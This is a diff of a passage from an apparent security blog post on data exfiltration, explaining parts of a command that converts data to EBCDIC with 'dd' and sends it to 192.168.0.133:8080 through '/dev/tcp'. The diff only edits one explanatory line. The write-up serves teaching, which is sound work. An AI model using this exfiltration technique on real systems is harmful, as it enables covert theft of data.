CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

     4. `|` Another pipe operator.

     5. `dd conv=ebcdic` This command is using the `dd` utility to perform low-level data copying and conversion.
-The `conv=ebcdic` option is used to convert the data from *ASCII* to *EBCDIC* encoding. *EBCDIC* is another character encoding standard, mostly used on older IBM systems.
+The `conv=ebcdic` option is used to convert the data from *ASCII* to *EBCDIC* encoding. [*EBCDIC*](https://www.techtarget.com/whatis/definition/EBCDIC-Extended-Binary-Coded-Decimal-Interchange-Code) is another character encoding standard, primarily used in IBM mainframes.

     6. `> /dev/tcp/192.168.0.133/8080` This part of the command redirects the output to the IP address 192.168.0.133 on port 8080 using a TCP socket.